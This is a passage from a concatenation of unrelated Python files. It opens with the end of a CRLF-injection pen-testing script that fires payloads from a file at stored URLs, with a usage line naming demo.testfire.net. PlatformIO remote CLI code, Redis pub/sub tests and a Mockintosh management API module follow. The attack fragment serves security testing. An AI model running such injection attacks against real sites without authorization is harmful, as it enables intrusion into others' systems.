"res_headers" : str(res.headers),
"res_content" : str(res.content),
"res_time" : res.elapsed.total_seconds()
})
print "[+] [%s][%s] %s?%s" %(case, method, url, payloads)
# case1 and get, case2 and get
else:
self.collection_saving_results.insert({"url" : url,
"attack name" : "crlf injection",
"method" : method,
"case" : case,
"payload" : res.url,
"res_code" : res.status_code,
"res_length" : len(str(res.content)),
"res_headers" : str(res.headers),
"res_content" : str(res.content),
"res_time" : res.elapsed.total_seconds()
})
print "[+] [%s][%s] %s" %(case, method, res.url)
if __name__ == "__main__":
usage = '''./crlf_injection.py -t testfire -p payload/crlf_strings -u demo.testfire.net -c cookie'''
parser = argparse.ArgumentParser(description = "crlf injection attack for pen testing", \
usage = usage)
parser.add_argument("-t", "--table", required=True, help="collection that saved urls")
parser.add_argument("-p", "--payload", required=True, help="payload characters to attack")
parser.add_argument("-u", "--url", required=True, help="requests in origin_url")
parser.add_argument("-c", "--cookie", required=False, help="filename that contains a cookie")
parser.add_argument("-o", "--timeout", required=False, help="default timeout is 1 sec")
parser.add_argument("-v", "--version", action='version', version = 'JongWon Kim (dikien2012@gmail.com)\n%(prog)s - v.1.1 (05/05/2014)')
args = parser.parse_args()
collection_saving_urls = args.table
attack_strings_filename = args.payload
origin_url = args.url
cookie_filename = args.cookie
timeout = args.timeout
start_time = timeit.default_timer()
os_version = sys.platform
crlf = crlf(collection_saving_urls, cookie_filename, attack_strings_filename, timeout, origin_url)
# 공격의 예상시간을 출력
crlf.predict_attack_time()
processes = []
# 공격에 필요한 url을 테이블에서 가져옴
urls = crlf.search_urls()
if os_version.find("win32") == -1:
for url in urls:
process = mp.Process(target = crlf.attack_case1, args=(url,))
processes.append(process)
process.start()
for item in processes:
item.join()
else:
for url in urls:
process = mp.Process(target = crlf.attack_case1(url))
processes = []
# case 2,3
if os_version.find("win32") == -1:
for url in urls:
process = mp.Process(target = crlf.attack_case2, args=(url,))
processes.append(process)
process.start()
for item in processes:
item.join()
else:
for url in urls:
process = mp.Process(target = crlf.attack_case2(url))
end_time = timeit.default_timer()
print "*" * 120
print '\nattack is done: ', end_time - start_time
print "*" * 120 |
command.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=too-many-arguments, import-outside-toplevel
# pylint: disable=inconsistent-return-statements
import os
import subprocess
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, fs, proc
from platformio.commands.device import helpers as device_helpers
from platformio.commands.device.command import device_monitor as cmd_device_monitor
from platformio.commands.run.command import cli as cmd_run
from platformio.commands.test.command import cli as cmd_test
from platformio.compat import PY2
from platformio.package.manager.core import inject_contrib_pysite
from platformio.project.exception import NotPlatformIOProjectError
@click.group("remote", short_help="Remote development")
@click.option("-a", "--agent", multiple=True)
@click.pass_context
def cli(ctx, agent):
if PY2:
raise exception.UserSideException(
"PlatformIO Remote Development requires Python 3.5 or above. \n"
"Please install the latest Python 3 and reinstall PlatformIO Core using "
"installation script:\n"
"https://docs.platformio.org/page/core/installation.html"
)
ctx.obj = agent
inject_contrib_pysite(verify_openssl=True)
@cli.group("agent", short_help="Start a new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(name, share, working_dir):
from platformio.commands.remote.client.agent_service import RemoteAgentService
RemoteAgentService(name, share, working_dir).connect()
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
from platformio.commands.remote.client.agent_list import AgentListClient
AgentListClient().connect()
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
"--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
@click.pass_obj
def remote_update(agents, only_check, dry_run):
from platformio.commands.remote.client.update_core import UpdateCoreClient
UpdateCoreClient("update", agents, dict(only_check=only_check or dry_run)).connect()
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_run(
ctx,
agents,
environment,
target,
upload_port,
project_dir,
disable_auto_clean,
force_remote,
silent,
verbose,
):
from platformio.commands.remote.client.run_or_test import RunOrTestClient
cr = RunOrTestClient(
"run",
agents,
dict(
environment=environment,
target=target,
upload_port=upload_port,
project_dir=project_dir,
disable_auto_clean=disable_auto_clean,
force_remote=force_remote,
silent=silent,
verbose=verbose,
),
)
if force_remote:
return cr.connect()
click.secho("Building project locally", bold=True)
local_targets = []
if "clean" in target:
local_targets = ["clean"]
elif set(["buildfs", "uploadfs", "uploadfsota"]) & set(target):
local_targets = ["buildfs"]
else:
local_targets = ["checkprogsize", "buildprog"]
ctx.invoke(
cmd_run,
environment=environment,
target=local_targets,
project_dir=project_dir,
# disable_auto_clean=True,
silent=silent,
verbose=verbose,
)
if any(["upload" in t for t in target] + ["program" in target]):
click.secho("Uploading firmware remotely", bold=True)
cr.options["target"] += ("nobuild",)
cr.options["disable_auto_clean"] = True
cr.connect()
return True
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_test(
ctx,
agents,
environment,
ignore,
upload_port,
test_port,
project_dir,
force_remote,
without_building,
without_uploading,
verbose,
):
from platformio.commands.remote.client.run_or_test import RunOrTestClient
cr = RunOrTestClient(
"test",
agents,
dict(
environment=environment,
ignore=ignore,
upload_port=upload_port,
test_port=test_port,
project_dir=project_dir,
force_remote=force_remote,
without_building=without_building,
without_uploading=without_uploading,
verbose=verbose,
),
)
if force_remote:
return cr.connect()
click.secho("Building project locally", bold=True)
ctx.invoke(
cmd_test,
environment=environment,
ignore=ignore,
project_dir=project_dir,
without_uploading=True,
without_testing=True,
verbose=verbose,
)
click.secho("Testing project remotely", bold=True)
cr.options["without_building"] = True
cr.connect()
return True
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
@click.pass_obj
def device_list(agents, json_output):
from platformio.commands.remote.client.device_list import DeviceListClient
DeviceListClient(agents, json_output).connect()
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
"--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
"--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)",
)
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)",
)
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
"-e",
"--environment",
help="Load configuration from `platformio.ini` and specified environment",
)
@click.option(
"--sock",
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.pass_obj
@click.pass_context
def device_monitor(ctx, agents, **kwargs):
from platformio.commands.remote.client.device_monitor import DeviceMonitorClient
if kwargs["sock"]:
return DeviceMonitorClient(agents, **kwargs).connect()
project_options = {}
try:
with fs.cd(kwargs["project_dir"]):
project_options = device_helpers.get_project_options(kwargs["environment"])
kwargs = device_helpers.apply_project_monitor_options(kwargs, project_options)
except NotPlatformIOProjectError:
pass
kwargs["baud"] = kwargs["baud"] or 9600
def _tx_target(sock_dir):
subcmd_argv = ["remote", "device", "monitor"]
subcmd_argv.extend(device_helpers.options_to_argv(kwargs, project_options))
subcmd_argv.extend(["--sock", sock_dir])
subprocess.call([proc.where_is_program("platformio")] + subcmd_argv)
sock_dir = mkdtemp(suffix="pio")
sock_file = os.path.join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir,))
t.start()
while t.is_alive() and not os.path.isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
with open(sock_file) as fp:
kwargs["port"] = fp.read()
ctx.invoke(cmd_device_monitor, **kwargs)
t.join(2)
finally:
fs.rmtree(sock_dir)
return True
|
pub_sub_test.py | import redis
from assert_helper import *
import time
import threading
from conn import *
def subscribe(channel, master=True):
conn = get_redis_conn(master)
p = conn.pubsub()
p.subscribe(channel)
for item in p.listen():
if item['type'] == "message":
assert (item['data'] == "a")
p.unsubscribe()
break
def psubscribe(pattern, master=True):
conn = get_redis_conn(master)
p = conn.pubsub()
p.psubscribe(pattern)
for item in p.listen():
if item['type'] == "pmessage":
assert (item['data'] == "a")
p.punsubscribe()
break
def test_replication():
channel = "test_publish"
x = threading.Thread(target=subscribe, args=(channel,))
x.start()
y = threading.Thread(target=subscribe, args=(channel, False))
y.start()
time.sleep(1)
conn = get_redis_conn()
ret = conn.publish(channel, "a")
assert (ret == 1)
time.sleep(0.01)
ret = conn.execute_command("pubsub", "channels")
assert (ret == [])
def test_pubsub_channels():
channel = "test_pubsub_channels"
channel_two = "two_test_pubsub_channels"
pattern_match_all = "test*"
pattern_unmatch_all = "a*"
pattern_match_question_mark = "test?pubsub_channels"
pattern_unmatch_question_mark = "tes?pubsub_channels"
pattern_match_or = "tes[ta]_pubsub_channels"
pattern_unmatch_or = "tes[sa]_pubsub_channels"
x = threading.Thread(target=subscribe, args=(channel,))
x.start()
time.sleep(1)
conn = get_redis_conn()
ret = conn.execute_command("pubsub", "channels")
assert (ret == [channel])
ret = conn.execute_command("pubsub", "channels", pattern_match_all)
assert (ret == [channel])
ret = conn.execute_command("pubsub", "channels", pattern_unmatch_all)
assert (ret == [])
ret = conn.execute_command("pubsub", "channels", pattern_match_question_mark)
assert (ret == [channel])
ret = conn.execute_command("pubsub", "channels", pattern_unmatch_question_mark)
assert (ret == [])
ret = conn.execute_command("pubsub", "channels", pattern_match_or)
assert (ret == [channel])
ret = conn.execute_command("pubsub", "channels", pattern_unmatch_or)
assert (ret == [])
y = threading.Thread(target=subscribe, args=(channel_two,))
y.start()
time.sleep(1)
ret = conn.execute_command("pubsub", "channels")
assert (ret == [channel, channel_two])
ret = conn.publish(channel, "a")
assert (ret == 1)
ret = conn.publish(channel_two, "a")
assert (ret == 1)
time.sleep(0.01)
ret = conn.execute_command("pubsub", "channels")
assert (ret == [])
def test_pubsub_numsub():
channel = "test_pubsub_numsub"
x = threading.Thread(target=subscribe, args=(channel,))
x.start()
time.sleep(1)
conn = get_redis_conn()
ret = conn.execute_command("pubsub", "numsub", channel)
assert (ret == [channel, 1L])
y = threading.Thread(target=subscribe, args=(channel,))
y.start()
time.sleep(1)
ret = conn.execute_command("pubsub", "numsub", channel)
assert (ret == [channel, 2L])
ret = conn.publish(channel, "a")
assert (ret == 2)
time.sleep(0.01)
ret = conn.execute_command("pubsub", "numsub", channel)
assert (ret == [channel, 0L])
def test_pubsub_numpat():
channel = "test_publish"
channel_two = "2_test_publish"
pattern_match_all = "test*"
pattern_match_all_two = "2*"
conn = get_redis_conn()
x = threading.Thread(target=psubscribe, args=(pattern_match_all,))
x.start()
time.sleep(1)
ret = conn.execute_command("pubsub", "numpat")
assert (ret == 1)
y = threading.Thread(target=psubscribe, args=(pattern_match_all_two,))
y.start()
time.sleep(1)
ret = conn.execute_command("pubsub", "numpat")
assert (ret == 2)
ret = conn.publish(channel, "a")
assert (ret == 1)
ret = conn.publish(channel_two, "a")
assert (ret == 1)
time.sleep(0.01)
ret = conn.execute_command("pubsub", "numpat")
assert (ret == 0) |
management.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: __init__
:synopsis: module that contains the handlers for the management API.
"""
import os
import re
import json
import copy
import shutil
import logging
import threading
from typing import (
Union,
Tuple, Optional, Awaitable
)
from collections import OrderedDict
from urllib.parse import parse_qs, unquote
import yaml
import yaml.scanner
import yaml.parser
from yaml.representer import Representer
import jsonschema
import tornado.web
from tornado.util import unicode_type
from tornado.escape import utf8
import mockintosh
from mockintosh.constants import PROGRAM
from mockintosh.config import ConfigExternalFilePath
from mockintosh.services.http import HttpService
from mockintosh.builders import ConfigRootBuilder
from mockintosh.handlers import GenericHandler
from mockintosh.helpers import _safe_path_split, _b64encode, _urlsplit
from mockintosh.exceptions import (
RestrictedFieldError,
AsyncProducerListHasNoPayloadsMatchingTags,
AsyncProducerPayloadLoopEnd,
AsyncProducerDatasetLoopEnd,
InternalResourcePathCheckError
)
from mockintosh.services.asynchronous import AsyncService, AsyncProducer, AsyncConsumer
from mockintosh.services.asynchronous._looping import run_loops as async_run_loops, stop_loops
from mockintosh.replicas import Request, Response
POST_CONFIG_RESTRICTED_FIELDS = ('port', 'hostname', 'ssl', 'sslCertFile', 'sslKeyFile')
UNHANDLED_SERVICE_KEYS = ('name', 'port', 'hostname')
UNHANDLED_IGNORED_HEADERS = (
'a-im',
'accept', 'accept-charset', 'accept-datetime', 'accept-encoding', 'accept-language',
'access-control-allow-credentials', 'access-control-allow-origin', 'access-control-request-headers',
'access-control-request-method',
'cache-control', 'connection', 'content-encoding', 'content-length', 'cookie',
'date', 'dnt', 'expect', 'forwarded', 'from', 'front-end-https', 'host', 'http2-settings',
'if-match', 'if-modified-since', 'if-none-match', 'if-range', 'if-unmodified-since',
'max-forwards', 'origin', 'pragma', 'proxy-authorization', 'proxy-connection', 'range', 'referer',
'save-data', 'sec-fetch-user', 'te', 'trailer', 'transfer-encoding', 'upgrade', 'upgrade-insecure-requests',
'user-agent', 'via', 'warning',
'x-att-deviceid', 'x-correlation-id',
'x-forwarded-for', 'x-forwarded-host', 'x-forwarded-port', 'x-forwarded-proto',
'x-http-method-override', 'x-real-ip', 'x-request-id', 'x-request-start', 'x-requested-with', 'x-uidh',
'x-wap-profile',
'x-envoy-expected-rq-timeout-ms', 'x-envoy-external-address'
)
__location__ = os.path.abspath(os.path.dirname(__file__))
def str_representer(dumper, data):
if "\n" in data.strip(): # pragma: no cover
# Check for multiline string
return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|')
return dumper.represent_scalar('tag:yaml.org,2002:str', data)
yaml.add_representer(str, str_representer)
yaml.add_representer(OrderedDict, Representer.represent_dict)
def _reset_iterators(app):
if isinstance(app, AsyncService):
for actor in app.actors:
if actor.producer is not None:
actor.producer.iteration = 0
return
for rule in app.default_router.rules[0].target.rules:
if rule.target == GenericHandler:
path_methods = rule.target_kwargs['path_methods']
for _, methods in path_methods:
for _, alternatives in methods.items():
for alternative in alternatives:
alternative.multi_responses_index = None
alternative.dataset_index = None
break
class ManagementBaseHandler(tornado.web.RequestHandler):
def write(self, chunk: Union[str, bytes, dict]) -> None:
if self._finished: # pragma: no cover
raise RuntimeError("Cannot write() after finish()")
if not isinstance(chunk, (bytes, unicode_type, dict)): # pragma: no cover
message = "write() only accepts bytes, unicode, and dict objects"
if isinstance(chunk, list):
message += (
". Lists not accepted for security reasons; see "
+ "http://www.tornadoweb.org/en/stable/web.html#tornado.web.RequestHandler.write" # noqa: E501, W503
)
raise TypeError(message)
if isinstance(chunk, dict):
chunk = json.dumps(chunk, sort_keys=False, indent=2)
self.set_header("Content-Type", "application/json; charset=UTF-8")
chunk = utf8(chunk)
self._write_buffer.append(chunk)
def _log(self) -> None:
if logging.DEBUG >= logging.root.level:
self.application.log_request(self)
def data_received(self, chunk: bytes) -> Optional[Awaitable[None]]:
pass
class ManagementRootHandler(ManagementBaseHandler):
async def get(self):
with open(os.path.join(__location__, 'res/management.html'), 'r') as file:
html = file.read()
self.write(html)
class ManagementConfigHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
async def get(self):
data = self.http_server.definition.data
self.dump(data)
async def post(self):
data = self.decode()
definition = self.http_server.definition
if data is None:
return
if not self.validate(data):
return
for i, service in enumerate(data['services']):
if 'type' in service and service['type'] != 'http': # pragma: no cover
continue
if not self.check_restricted_fields(service, i):
return
stop_loops()
self.http_server.clear_lists()
definition.stats.services = []
definition.services, definition.config_root = definition.analyze(data)
for service in HttpService.services:
self.update_service(service, service.internal_service_id)
definition.stats.reset()
definition.data = data
self.update_globals()
async_run_loops()
self.set_status(204)
def update_service(self, service: HttpService, service_index: int) -> None:
self.http_server.definition.stats.services[service_index].endpoints = []
self.http_server.definition.logs.services[service_index].name = service.get_name_or_empty()
http_path_list = []
if service.endpoints:
http_path_list = mockintosh.servers.HttpServer.merge_alternatives(
service,
self.http_server.definition.stats
)
path_methods = []
for http_path in http_path_list:
path_methods.append((http_path.path, http_path.methods))
for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
if rule.target == GenericHandler:
rule.target_kwargs['path_methods'] = path_methods
break
mockintosh.servers.HttpServer.log_path_methods(path_methods)
def check_restricted_fields(self, service: dict, service_index) -> bool:
try:
self._check_restricted_fields(service, service_index)
return True
except RestrictedFieldError as e:
self.set_status(400)
self.write(str(e))
return False
def _check_restricted_fields(self, service, service_index):
old_service = self.http_server.definition.data['services'][service_index]
for field in POST_CONFIG_RESTRICTED_FIELDS:
if (
(field in service and field not in old_service)
or # noqa: W504, W503
(field not in service and field in old_service)
or # noqa: W504, W503
field in service and field in old_service and (
service[field] != old_service[field]
)
):
raise RestrictedFieldError(field)
def update_globals(self):
for service in HttpService.services:
self.http_server.globals = self.http_server.definition.data['globals'] if (
'globals' in self.http_server.definition.data
) else {}
for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
if rule.target == GenericHandler:
rule.target_kwargs['_globals'] = self.http_server.globals
def decode(self) -> Union[dict, None]:
body = self.request.body.decode()
try:
return yaml.safe_load(body)
except (yaml.scanner.ScannerError, yaml.parser.ParserError) as e:
self.set_status(400)
self.write('JSON/YAML decode error:\n%s' % str(e))
return None
def validate(self, data) -> bool:
try:
jsonschema.validate(instance=data, schema=self.http_server.definition.schema)
return True
except jsonschema.exceptions.ValidationError as e:
self.set_status(400)
self.write('JSON schema validation error:\n%s' % str(e))
return False
def dump(self, data) -> None:
_format = self.get_query_argument('format', default='json')
if _format == 'yaml':
self.set_header('Content-Type', 'application/x-yaml')
self.write(yaml.dump(data, sort_keys=False))
else:
self.write(data)
class ManagementStatsHandler(ManagementBaseHandler):
def initialize(self, stats):
self.stats = stats
async def get(self):
self.write(self.stats.json())
async def delete(self):
self.stats.reset()
self.set_status(204)
class ManagementLogsHandler(ManagementBaseHandler):
def initialize(self, logs):
self.logs = logs
async def get(self):
self.write(self.logs.json())
async def post(self):
enabled = not self.get_body_argument('enable', default='True') in ('false', 'False', '0')
for service in self.logs.services:
service.enabled = enabled
self.set_status(204)
async def delete(self):
self.write(self.logs.json())
self.logs.reset()
class ManagementResetIteratorsHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
async def post(self):
for app in self.http_server._apps.apps:
_reset_iterators(app)
for app in AsyncService.services:
_reset_iterators(app)
self.set_status(204)
class ManagementUnhandledHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
async def get(self):
data = {
'services': []
}
for i, service in enumerate(HttpService.services):
endpoints = self.build_unhandled_requests(i)
if not endpoints:
continue
new_service = dict((k, getattr(service, k)) for k in UNHANDLED_SERVICE_KEYS if getattr(service, k) is not None)
new_service['endpoints'] = endpoints
data['services'].append(new_service)
if data['services'] and not self.validate(data): # pragma: no cover
return
unhandled_data_enabled = False
break_parent = False
for app in self.http_server._apps.apps:
if break_parent:
break
for rule in app.default_router.rules[0].target.rules:
if rule.target == GenericHandler:
if rule.target_kwargs['unhandled_data']:
unhandled_data_enabled = True
if unhandled_data_enabled:
break_parent = True
break
self.set_header('x-%s-unhandled-data' % PROGRAM.lower(), 'true' if unhandled_data_enabled else 'false')
self.dump(data)
async def post(self):
data = self.get_query_argument('data', default=None)
if data is None:
data = self.request.body.decode()
unhandled_data = self.http_server.unhandled_data if data not in (None, False, 'false', 'False', 'None') else None
for app in self.http_server._apps.apps:
for rule in app.default_router.rules[0].target.rules:
if rule.target == GenericHandler:
rule.target_kwargs['unhandled_data'] = unhandled_data
for service in AsyncService.services:
service.tags = data
self.set_status(204)
async def delete(self):
for i, _ in enumerate(self.http_server.unhandled_data.requests):
for key, _ in self.http_server.unhandled_data.requests[i].items():
self.http_server.unhandled_data.requests[i][key] = []
self.set_status(204)
def build_unhandled_requests_headers(self, config_template: dict, request: Request, requests: dict) -> None:
for key, value in request.headers._dict.items():
continue_parent = False
for _request in requests:
if (
(key.title() not in _request[0].headers._dict)
or # noqa: W504, W503
(key.title() in _request[0].headers._dict and value != _request[0].headers._dict[key.title()])
):
continue_parent = True
break
if continue_parent:
continue
if key.lower() not in UNHANDLED_IGNORED_HEADERS:
if 'headers' not in config_template:
config_template['headers'] = {}
config_template['headers'][key] = value
def build_unhandled_requests_response(self, config_template: dict, response: Response) -> None:
if response is None:
config_template['response'] = ''
else:
response.headers.pop('Content-Length', None)
config_template['response'] = {
'status': response.status,
'headers': {},
'body': ''
}
for key, value in response.headers.items():
try:
config_template['response']['headers'][key] = value.decode()
except (AttributeError, UnicodeDecodeError):
config_template['response']['headers'][key] = _b64encode(value) if isinstance(value, (bytes, bytearray)) else value
if response.body is not None:
try:
config_template['response']['body'] = response.body.decode()
except (AttributeError, UnicodeDecodeError):
config_template['response']['body'] = _b64encode(response.body) if isinstance(response.body, (bytes, bytearray)) else response.body
def build_unhandled_requests(self, service_id: int) -> list:
endpoints = []
for requests in self.http_server.unhandled_data.requests[service_id].values():
if not requests:
continue
request = requests[-1][0]
response = requests[-1][1]
config_template = {}
# Path
config_template['path'] = request.path
# Method
config_template['method'] = request.method
# Headers
self.build_unhandled_requests_headers(config_template, request, requests)
# Query String
for key, value in request.query_arguments.items():
if 'queryString' not in config_template:
config_template['queryString'] = {}
config_template['queryString'][key] = value[0].decode()
# Response
self.build_unhandled_requests_response(config_template, response)
endpoints.append(config_template)
return endpoints
def validate(self, data) -> bool:
try:
jsonschema.validate(instance=data, schema=self.http_server.definition.schema)
return True
except jsonschema.exceptions.ValidationError as e: # pragma: no cover
self.set_status(400)
self.write('JSON schema validation error:\n%s' % str(e))
return False
def dump(self, data) -> None:
_format = self.get_query_argument('format', default='json')
if _format == 'yaml':
self.set_header('Content-Type', 'application/x-yaml')
self.write(yaml.dump(data, sort_keys=False))
else:
self.write(data)
class ManagementOasHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
async def get(self):
data = {
'documents': []
}
for service in HttpService.services:
data['documents'].append(self.build_oas(service.internal_service_id))
self.write(data)
def build_oas(self, service_id):
service = self.http_server.definition.services[service_id]
ssl = service.ssl
protocol = 'https' if ssl else 'http'
hostname = self.http_server.address if self.http_server.address else (
'localhost' if service.hostname is None else service.hostname
)
if service.oas is not None:
return self.build_oas_custom(protocol, hostname, service)
document = {
'openapi': '3.0.0',
'info': {
'title': service.name if service.name is not None else '%s://%s:%s' % (protocol, hostname, service.port),
'description': 'Automatically generated Open API Specification.',
'version': '0.1.9'
},
'servers': [
{
'url': '%s://%s:%s' % (protocol, hostname, service.port),
'description': service.get_name_or_empty()
}
],
'paths': {}
}
path_methods = []
for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
if rule.target == GenericHandler:
path_methods = rule.target_kwargs['path_methods']
for _, _methods in path_methods:
path, methods = self.build_oas_methods(_methods)
document['paths']['%s' % path] = methods
document['paths'] = OrderedDict(sorted(document['paths'].items(), key=lambda t: t[0]))
return document
def build_oas_methods(self, _methods: dict) -> Tuple[str, dict]:
first_alternative = list(_methods.values())[0][0]
original_path = first_alternative.orig_path
scheme, netloc, original_path, query, fragment = _urlsplit(original_path)
query_string = parse_qs(query, keep_blank_values=True)
path, path_params = self.path_handlebars_to_oas(original_path)
methods = {}
for method, alternatives in _methods.items():
if not alternatives: # pragma: no cover
continue # https://github.com/nedbat/coveragepy/issues/198
alternative = alternatives[0]
method_data = alternative.oas(path_params, query_string, self)
if not method_data['responses']:
method_data['responses']['default'] = {
'description': ''
}
methods[method.lower()] = method_data
return path, methods
def build_oas_custom(self, protocol: str, hostname: str, service: HttpService) -> dict:
custom_oas = service.oas
if isinstance(custom_oas, ConfigExternalFilePath):
custom_oas_path = self.resolve_relative_path(self.http_server.definition.source_dir, custom_oas.path)
with open(custom_oas_path, 'r') as file:
custom_oas = json.load(file)
if 'servers' not in custom_oas:
custom_oas['servers'] = []
custom_oas['servers'].insert(
0,
{
'url': '%s://%s:%s' % (protocol, hostname, service.port),
'description': service.get_name_or_empty()
}
)
return custom_oas
def path_handlebars_to_oas(self, path: str) -> Tuple[str, list]:
segments = _safe_path_split(path)
params = []
new_segments = []
for segment in segments:
match = re.search(r'{{(.*)}}', segment)
if match is not None:
name = match.group(1).strip()
param = None
if ' ' not in name:
param = name
else:
param = 'param%d' % (len(params) + 1)
new_segments.append('{%s}' % param)
params.append(param)
else:
new_segments.append(segment)
return '/'.join(new_segments), params
def resolve_relative_path(self, config_dir, source_text):
relative_path = None
orig_relative_path = source_text[1:]
error_msg = 'External OAS document %r couldn\'t be accessed or found!' % orig_relative_path
if orig_relative_path[0] == '/':
orig_relative_path = orig_relative_path[1:]
relative_path = os.path.join(config_dir, orig_relative_path)
if not os.path.isfile(relative_path):
self.send_error(500, message=error_msg)
return None
relative_path = os.path.abspath(relative_path)
if not relative_path.startswith(config_dir):
self.send_error(500, message=error_msg)
return None
return relative_path
class ManagementTagHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
async def get(self):
data = {
'tags': []
}
for app in self.http_server._apps.apps:
for rule in app.default_router.rules[0].target.rules:
if rule.target == GenericHandler:
data['tags'] += rule.target_kwargs['tags']
for service in AsyncService.services:
data['tags'] += service.tags
data['tags'] = list(set(data['tags']))
self.write(data)
async def post(self):
data = self.get_query_argument('current', default=None)
if data is None:
data = self.request.body.decode()
data = data.split(',')
for app in self.http_server._apps.apps:
for rule in app.default_router.rules[0].target.rules:
if rule.target == GenericHandler:
rule.target_kwargs['tags'] = data
for service in AsyncService.services:
service.tags = data
self.set_status(204)
class ManagementResourcesHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
files = (obj.path[1:] for obj in ConfigExternalFilePath.files)
cwd = self.http_server.definition.source_dir
files = list(set(files))
files = list(filter(lambda x: (os.path.abspath(os.path.join(cwd, x)).startswith(cwd)), files))
new_files = []
for path in files:
fail = False
for segment in os.path.split(path):
match = re.search(r'{{(.*)}}', segment)
if match is not None:
fail = True
break
if not fail:
new_files.append(path)
files = new_files
self.files = sorted(files)
self.files_abs = [os.path.abspath(os.path.join(cwd, x)) for x in self.files]
async def get(self):
data = None
cwd = self.http_server.definition.source_dir
path = self.get_query_argument('path', default=None)
orig_path = path
if path is None:
data = {
'files': self.files
}
self.write(data)
return
else:
try:
self.check_path_empty(path)
path = os.path.abspath(os.path.join(cwd, path.lstrip('/')))
self.check_path_access(cwd, path, orig_path)
# path is SAFE
self.check_path_exists(path, orig_path)
# path is OK
self.check_path_is_not_directory(path, orig_path)
self.check_if_path_defined_in_configuration_file(path, orig_path)
except InternalResourcePathCheckError:
return
else:
_format = self.get_query_argument('format', default='text')
if _format == 'text':
with open(path, 'rb') as file:
data = file.read()
elif _format == 'stream':
buf_size = 4096
self.set_header('Content-Type', 'application/octet-stream')
self.set_header('Content-Disposition', 'attachment; filename=' + os.path.basename(path))
with open(path, 'rb') as f:
while True:
data = f.read(buf_size)
if not data:
break
self.write(data)
return
self.write(data)
async def post(self):
cwd = self.http_server.definition.source_dir
path = self.get_body_argument('path', default=None)
orig_path = path
try:
if path is not None:
